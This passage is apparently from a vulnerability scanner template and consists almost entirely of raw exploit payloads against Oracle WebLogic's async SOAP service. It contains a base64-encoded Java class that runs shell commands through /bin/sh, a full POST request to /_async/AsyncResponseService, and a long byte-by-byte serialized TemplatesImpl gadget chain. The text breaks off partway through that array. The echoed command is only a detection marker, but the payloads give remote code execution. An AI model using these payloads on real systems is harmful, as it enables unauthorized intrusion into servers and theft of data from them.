tZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>6</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>91</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>10</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>98</byte></void><void index=\"201\"><byte>121</byte></void><void index=\"202\"><byte>116</byte></void><void index=\"203\"><byte>101</byte></void><void index=\"204\"><byte>99</byte></void><void index=\"205\"><byte>111</byte></void><void index=\"206\"><byte>100</byte></void><void index=\"207\"><byte>101</byte></void><void index=\"208\"><byte>115</byte></void><void index=\"209\"><byte>116</byte></void><void index=\"210\"><byte>0</byte></void><void index=\"211\"><byte>3</byte></void><void index=\"212\"><byte>91</byte></void><void index=\"213\"><byte>91</byte></void><void index=\"214\"><byte>66</byte></void><void index=\"215\"><byte>91</byte></void><void index=\"216\"><byte>0</byte></void><void index=\"217\"><byte>6</byte></void><void index=\"218\"><byte>95</byte></void><void index=\"219\"><byte>99</byte></void><void index=\"220\"><byte>108</byte></void><void index=\"221\"><byte>97</byte></void><void index=\"222\"><byte>115</byte></void><void index=\"223\"><byte>115</byte></void><void index=\"224\"><byte>116</byte></void><void index=\"225\"><byte>0</byte></void><void index=\"226\"><byte>18</byte></void><void index=\"227\"><byte>91</byte></void><void index=\"228\"><byte>76</byte></void><void index=\"229\"><byte>106</byte></void><void index=\"230\"><byte>97</byte></void><void index=\"231\"><byte>118</byte></void><void index=\"232\"><byte>97</byte></void><void index=\"233\"><byte>47</byte></void><void index=\"234\"><byte>108</byte></void><void index=\"235\"><byte>97</byte></void><void index=\"236\"><byte>110</byte></void><void index=\"237\"><byte>103</byte></void><void index=\"238\"><byte>47</byte></void><void index=\"239\"><byte>67</byte></void><void index=\"240\"><byte>108</byte></void><void index=\"241\"><byte>97</byte></void><void index=\"242\"><byte>115</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>59</byte></void><void index=\"245\"><byte>76</byte></void><void index=\"246\"><byte>0</byte></void><void index=\"247\"><byte>5</byte></void><void index=\"248\"><byte>95</byte></void><void index=\"249\"><byte>110</byte></void><void index=\"250\"><byte>97</byte></void><void index=\"251\"><byte>109</byte></void><void index=\"252\"><byte>101</byte></void><void index=\"253\"><byte>116</byte></void><void index=\"254\"><byte>0</byte></void><void index=\"255\"><byte>18</byte></void><void index=\"256\"><byte>76</byte></void><void index=\"257\"><byte>106</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>118</byte></void><void index=\"260\"><byte>97</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>108</byte></void><void index=\"263\"><byte>97</byte></void><void index=\"264\"><byte>110</byte></void><void index=\"265\"><byte>103</byte></void><void index=\"266\"><byte>47</byte></void><void index=\"267\"><byte>83</byte></void><void index=\"268\"><byte>116</byte></void><void index=\"269\"><byte>114</byte></void><void index=\"270\"><byte>105</byte></void><void index=\"271\"><byte>110</byte></void><void index=\"272\"><byte>103</byte></void><void index=\"273\"><byte>59</byte></void><void index=\"274\"><byte>76</byte></void><void index=\"275\"><byte>0</byte></void><void index=\"276\"><byte>17</byte></void><void index=\"277\"><byte>95</byte></void><void index=\"278\"><byte>111</byte></void><void index=\"279\"><byte>117</byte></void><void index=\"280\"><byte>116</byte></void><void index=\"281\"><byte>112</byte></void><void index=\"282\"><byte>117</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>80</byte></void><void index=\"285\"><byte>114</byte></void><void index=\"286\"><byte>111</byte></void><void index=\"287\"><byte>112</byte></void><void index=\"288\"><byte>101</byte></void><void index=\"289\"><byte>114</byte></void><void index=\"290\"><byte>116</byte></void><void index=\"291\"><byte>105</byte></void><void index=\"292\"><byte>101</byte></void><void index=\"293\"><byte>115</byte></void><void index=\"294\"><byte>116</byte></void><void index=\"295\"><byte>0</byte></void><void index=\"296\"><byte>22</byte></void><void index=\"297\"><byte>76</byte></void><void index=\"298\"><byte>106</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>118</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>47</byte></void><void index=\"303\"><byte>117</byte></void><void index=\"304\"><byte>116</byte></void><void index=\"305\"><byte>105</byte></void><void index=\"306\"><byte>108</byte></void><void index=\"307\"><byte>47</byte></void><void index=\"308\"><byte>80</byte></void><void index=\"309\"><byte>114</byte></void><void index=\"310\"><byte>111</byte></void><void index=\"311\"><byte>112</byte></void><void index=\"312\"><byte>101</byte></void><void index=\"313\"><byte>114</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>105</byte></void><void index=\"316\"><byte>101</byte></void><void index=\"317\"><byte>115</byte></void><void index=\"318\"><byte>59</byte></void><void index=\"319\"><byte>120</byte></void><void index=\"320\"><byte>112</byte></void><void index=\"321\"><byte>0</byte></void><void index=\"322\"><byte>0</byte></void><void index=\"323\"><byte>0</byte></void><void index=\"324\"><byte>0</byte></void><void index=\"325\"><byte>-1</byte></void><void index=\"326\"><byte>-1</byte></void><void index=\"327\"><byte>-1</byte></void><void index=\"328\"><byte>-1</byte></void><void index=\"329\"><byte>117</byte></void><void index=\"330\"><byte>114</byte></void><void index=\"331\"><byte>0</byte></void><void index=\"332\"><byte>3</byte></void><void index=\"333\"><byte>91</byte></void><void index=\"334\"><byte>91</byte></void><void index=\"335\"><byte>66</byte></void><void index=\"336\"><byte>75</byte></void><void index=\"337\"><byte>-3</byte></void><void index=\"338\"><byte>25</byte></void><void index=\"339\"><byte>21</byte></void><void index=\"340\"><byte>103</byte></void><void index=\"341\"><byte>103</byte></void><void index=\"342\"><byte>-37</byte></void><void index=\"343\"><byte>55</byte></void><void index=\"344\"><byte>2</byte></void><void index=\"345\"><byte>0</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>120</byte></void><void index=\"348\"><byte>112</byte></void><void index=\"349\"><byte>0</byte></void><void index=\"350\"><byte>0</byte></void><void index=\"351\"><byte>0</byte></void><void index=\"352\"><byte>2</byte></void><void index=\"353\"><byte>117</byte></void><void index=\"354\"><byte>114</byte></void><void index=\"355\"><byte>0</byte></void><void index=\"356\"><byte>2</byte></void><void index=\"357\"><byte>91</byte></void><void index=\"358\"><byte>66</byte></void><void index=\"359\"><byte>-84</byte></void><void index=\"360\"><byte>-13</byte></void><void index=\"361\"><byte>23</byte></void><void index=\"362\"><byte>-8</byte></void><void index=\"363\"><byte>6</byte></void><void index=\"364\"><byte>8</byte></void><void index=\"365\"><byte>84</byte></void><void index=\"366\"><byte>-32</byte></void><void index=\"367\"><byte>2</byte></void><void index=\"368\"><byte>0</byte></void><void index=\"369\"><byte>0</byte></void><void index=\"370\"><byte>120</byte></void><void index=\"371\"><byte>112</byte></void><void index=\"372\"><byte>0</byte></void><void index=\"373\"><byte>0</byte></void><void index=\"374\"><byte>8</byte></void><void index=\"375\"><byte>-82</byte></void><void index=\"376\"><byte>-54</byte></void><void index=\"377\"><byte>-2</byte></void><void index=\"378\"><byte>-70</byte></void><void index=\"379\"><byte>-66</byte></void><void index=\"380\"><byte>0</byte></void><void index=\"381\"><byte>0</byte></void><void index=\"382\"><byte>0</byte></void><void index=\"383\"><byte>50</byte></void><void index=\"384\"><byte>0</byte></void><void index=\"385\"><byte>99</byte></void><void index=\"386\"><byte>10</byte></void><void index=\"387\"><byte>0</byte></void><void index=\"388\"><byte>3</byte></void><void index=\"389\"><byte>0</byte></void><void index=\"390\"><byte>34</byte></void><void index=\"391\"><byte>7</byte></void><void index=\"392\"><byte>0</byte></void><void index=\"393\"><byte>97</byte></void><void index=\"394\"><byte>7</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>37</byte></void><void index=\"397\"><byte>7</byte></void><void index=\"398\"><byte>0</byte></void><void index=\"399\"><byte>38</byte></void><void index=\"400\"><byte>1</byte></void><void index=\"401\"><byte>0</byte></void><void index=\"402\"><byte>16</byte></void><void index=\"403\"><byte>115</byte></void><void index=\"404\"><byte>101</byte></void><void index=\"405\"><byte>114</byte></void><void index=\"406\"><byte>105</byte></void><void index=\"407\"><byte>97</byte></void><void index=\"408\"><byte>108</byte></void><void index=\"409\"><byte>86</byte></void><void index=\"410\"><byte>101</byte></void><void index=\"411\"><byte>114</byte></void><void index=\"412\"><byte>115</byte></void><void index=\"413\"><byte>105</byte></void><void index=\"414\"><byte>111</byte></void><void index=\"415\"><byte>110</byte></void><void index=\"416\"><byte>85</byte></void><void index=\"417\"><byte>73</byte></void><void index=\"418\"><byte>68</byte></void><void index=\"419\"><byte>1</byte></void><void index=\"420\"><byte>0</byte></void><void index=\"421\"><byte>1</byte></void><void index=\"422\"><byte>74</byte></void><void index=\"423\"><byte>1</byte></void><void index=\"424\"><byte>0</byte></void><void index=\"425\"><byte>13</byte></void><void index=\"426\"><byte>67</byte></void><void index=\"427\"><byte>111</byte></void><void index=\"428\"><byte>110</byte></void><void index=\"429\"><byte>115</byte></void><void index=\"430\"><byte>116</byte></void><void index=\"431\"><byte>97</byte></void><void index=\"432\"><byte>110</byte></void><void index=\"433\"><byte>116</byte></void><void index=\"434\"><byte>86</byte></void><void index=\"435\"><byte>97</byte></void><void index=\"436\"><byte>108</byte></void><void index=\"437\"><byte>117</byte></void><void index=\"438\"><byte>101</byte></void><void index=\"439\"><byte>5</byte></void><void index=\"440\"><byte>-83</byte></void><void index=\"441\"><byte>32</byte></void><void index=\"442\"><byte>-109</byte></void><void index=\"443\"><byte>-13</byte></void><void index=\"444\"><byte>-111</byte></void><void index=\"445\"><byte>-35</byte></void><void index=\"446\"><byte>-17</byte></void><void index=\"447\"><byte>62</byte></void><void index=\"448\"><byte>1</byte></void><void index=\"449\"><byte>0</byte></void><void index=\"450\"><byte>6</byte></void><void index=\"451\"><byte>60</byte></void><void index=\"452\"><byte>105</byte></void><void index=\"453\"><byte>110</byte></void><void index=\"454\"><byte>105</byte></void><void index=\"455\"><byte>116</byte></void><void index=\"456\"><byte>62</byte></void><void index=\"457\"><byte>1</byte></void><void index=\"458\"><byte>0</byte></void><void index=\"459\"><byte>3</byte></void><void index=\"460\"><byte>40</byte></void><void index=\"461\"><byte>41</byte></void><void index=\"462\"><byte>86</byte></void><void index=\"463\"><byte>1</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>4</byte></void><void index=\"466\"><byte>67</byte></void><void index=\"467\"><byte>111</byte></void><void index=\"468\"><byte>100</byte></void><void index=\"469\"><byte>101</byte></void><void index=\"470\"><byte>1</byte></void><void index=\"471\"><byte>0</byte></void><void index=\"472\"><byte>15</byte></void><void index=\"473\"><byte>76</byte></void><void index=\"474\"><byte>105</byte></void><void index=\"475\"><byte>110</byte></void><void index=\"476\"><byte>101</byte></void><void index=\"477\"><byte>78</byte></void><void index=\"478\"><byte>117</byte></void><void index=\"479\"><byte>109</byte></void><void index=\"480\"><byte>98</byte></void><void index=\"481\"><byte>101</byte></void><void index=\"482\"><byte>114</byte></void><void index=\"483\"><byte>84</byte></void><void index=\"484\"><byte>97</byte></void><void index=\"485\"><byte>98</byte></void><void index=\"486\"><byte>108</byte></void><void index=\"487\"><byte>101</byte></void><void index=\"488\"><byte>1</byte></void><void index=\"489\"><byte>0</byte></void><void index=\"490\"><byte>18</byte></void><void index=\"491\"><byte>76</byte></void><void index=\"492\"><byte>111</byte></void><void index=\"493\"><byte>99</byte></void><void index=\"494\"><byte>97</byte></void><void index=\"495\"><byte>108</byte></void><void index=\"496\"><byte>86</byte></void><void index=\"497\"><byte>97</byte></void><void index=\"498\"><byte>114</byte></void><void index=\"499\"><byte>105</byte></void><void index=\"500\"><byte>97</byte></void><void index=\"501\"><byte>98</byte></void><void index=\"502\"><byte>108</byte></void><void index=\"503\"><byte>101</byte></void><void index=\"504\"><byte>84</byte></void><void index=\"505\"><byte>97</byte></void><void index=\"506\"><byte>98</byte></void><void index=\"507\"><byte>108</byte></void><void index=\"508\"><byte>101</byte></void><void index=\"509\"><byte>1</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>4</byte></void><void index=\"512\"><byte>116</byte></void><void index=\"513\"><byte>104</byte></void><void index=\"514\"><byte>105</byte></void><void index=\"515\"><byte>115</byte></void><void index=\"516\"><byte>1</byte></void><void index=\"517\"><byte>0</byte></void><void index=\"518\"><byte>19</byte></void><void index=\"519\"><byte>83</byte></void><void index=\"520\"><byte>116</byte></void><void index=\"521\"><byte>117</byte></void><void index=\"522\"><byte>98</byte></void><void index=\"523\"><byte>84</byte></void><void index=\"524\"><byte>114</byte></void><void index=\"525\"><byte>97</byte></void><void index=\"526\"><byte>110</byte></void><void index=\"527\"><byte>115</byte></void><void index=\"528\"><byte>108</byte></void><void index=\"529\"><byte>101</byte></void><void index=\"530\"><byte>116</byte></void><void index=\"531\"><byte>80</byte></void><void index=\"532\"><byte>97</byte></void><void index=\"533\"><byte>121</byte></void><void index=\"534\"><byte>108</byte></void><void index=\"535\"><byte>111</byte></void><void index=\"536\"><byte>97</byte></void><void index=\"537\"><byte>100</byte></void><void index=\"538\"><byte>1</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>12</byte></void><void index=\"541\"><byte>73</byte></void><void index=\"542\"><byte>110</byte></void><void index=\"543\"><byte>110</byte></void><void index=\"544\"><byte>101</byte></void><void index=\"545\"><byte>114</byte></void><void index=\"546\"><byte>67</byte></void><void index=\"547\"><byte>108</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>115</byte></void><void index=\"550\"><byte>115</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>115</byte></void><void index=\"553\"><byte>1</byte></void><void index=\"554\"><byte>0</byte></void><void index=\"555\"><byte>53</byte></void><void index=\"556\"><byte>76</byte></void><void index=\"557\"><byte>121</byte></void><void index=\"558\"><byte>115</byte></void><void index=\"559\"><byte>111</byte></void><void index=\"560\"><byte>115</byte></void><void index=\"561\"><byte>101</byte></void><void index=\"562\"><byte>114</byte></void><void index=\"563\"><byte>105</byte></void><void index=\"564\"><byte>97</byte></void><void index=\"565\"><byte>108</byte></void><void index=\"566\"><byte>47</byte></void><void index=\"567\"><byte>112</byte></void><void index=\"568\"><byte>97</byte></void><void index=\"569\"><byte>121</byte></void><void index=\"570\"><byte>108</byte></void><void index=\"571\"><byte>111</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>100</byte></void><void index=\"574\"><byte>115</byte></void><void index=\"575\"><byte>47</byte></void><void index=\"576\"><byte>117</byte></void><void index=\"577\"><byte>116</byte></void><void index=\"578\"><byte>105</byte></void><void index=\"579\"><byte>108</byte></void><void index=\"580\"><byte>47</byte></void><void index=\"581\"><byte>71</byte></void><void index=\"582\"><byte>97</byte></void><void index=\"583\"><byte>100</byte></void><void index=\"584\"><byte>103</byte></void><void index=\"585\"><byte>101</byte></void><void index=\"586\"><byte>116</byte></void><void index=\"587\"><byte>115</byte></void><void index=\"588\"><byte>36</byte></void><void index=\"589\"><byte>83</byte></void><void index=\"590\"><byte>116</byte></void><void index=\"591\"><byte>117</byte></void><void index=\"592\"><byte>98</byte></void><void index=\"593\"><byte>84</byte></void><void index=\"594\"><byte>114</byte></void><void index=\"595\"><byte>97</byte></void><void index=\"596\"><byte>110</byte></void><void index=\"597\"><byte>115</byte></void><void index=\"598\"><byte>108</byte></void><void index=\"599\"><byte>101</byte></void><void index=\"600\"><byte>116</byte></void><void index=\"601\"><byte>80</byte></void><void index=\"602\"><byte>97</byte></void><void index=\"603\"><byte>121</byte></void><void index=\"604\"><byte>108</byte></void><void index=\"605\"><byte>111</byte></void><void index=\"606\"><byte>97</byte></void><void index=\"607\"><byte>100</byte></void><void index=\"608\"><byte>59</byte></void><void index=\"609\"><byte>1</byte></void><void index=\"610\"><byte>0</byte></void><void index=\"611\"><byte>9</byte></void><void index=\"612\"><byte>116</byte></void><void index=\"613\"><byte>114</byte></void><void index=\"614\"><byte>97</byte></void><void index=\"615\"><byte>110</byte></void><void index=\"616\"><byte>115</byte></void><void index=\"617\"><byte>102</byte></void><void index=\"618\"><byte>111</byte></void><void index=\"619\"><byte>114</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>1</byte></void><void index=\"622\"><byte>0</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>40</byte></void><void index=\"625\"><byte>76</byte></void><void index=\"626\"><byte>99</byte></void><void index=\"627\"><byte>111</byte></void><void index=\"628\"><byte>109</byte></void><void index=\"629\"><byte>47</byte></void><void index=\"630\"><byte>115</byte></void><void index=\"631\"><byte>117</byte></void><void index=\"632\"><byte>110</byte></void><void index=\"633\"><byte>47</byte></void><void index=\"634\"><byte>111</byte></void><void index=\"635\"><byte>114</byte></void><void index=\"636\"><byte>103</byte></void><void index=\"637\"><byte>47</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>112</byte></void><void index=\"640\"><byte>97</byte></void><void index=\"641\"><byte>99</byte></void><void index=\"642\"><byte>104</byte></void><void index=\"643\"><byte>101</byte></void><void index=\"644\"><byte>47</byte></void><void index=\"645\"><byte>120</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>108</byte></void><void index=\"648\"><byte>97</byte></void><void index=\"649\"><byte>110</byte></void><void index=\"650\"><byte>47</byte></void><void index=\"651\"><byte>105</byte></void><void index=\"652\"><byte>110</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>101</byte></void><void index=\"655\"><byte>114</byte></void><void index=\"656\"><byte>110</byte></void><void index=\"657\"><byte>97</byte></void><void index=\"658\"><byte>108</byte></void><void index=\"659\"><byte>47</byte></void><void index=\"660\"><byte>120</byte></void><void index=\"661\"><byte>115</byte></void><void index=\"662\"><byte>108</byte></void><void index=\"663\"><byte>116</byte></void><void index=\"664\"><byte>99</byte></void><void index=\"665\"><byte>47</byte></void><void index=\"666\"><byte>68</byte></void><void index=\"667\"><byte>79</byte></void><void index=\"668\"><byte>77</byte></void><void index=\"669\"><byte>59</byte></void><void index=\"670\"><byte>91</byte></void><void index=\"671\"><byte>76</byte></void><void index=\"672\"><byte>99</byte></void><void 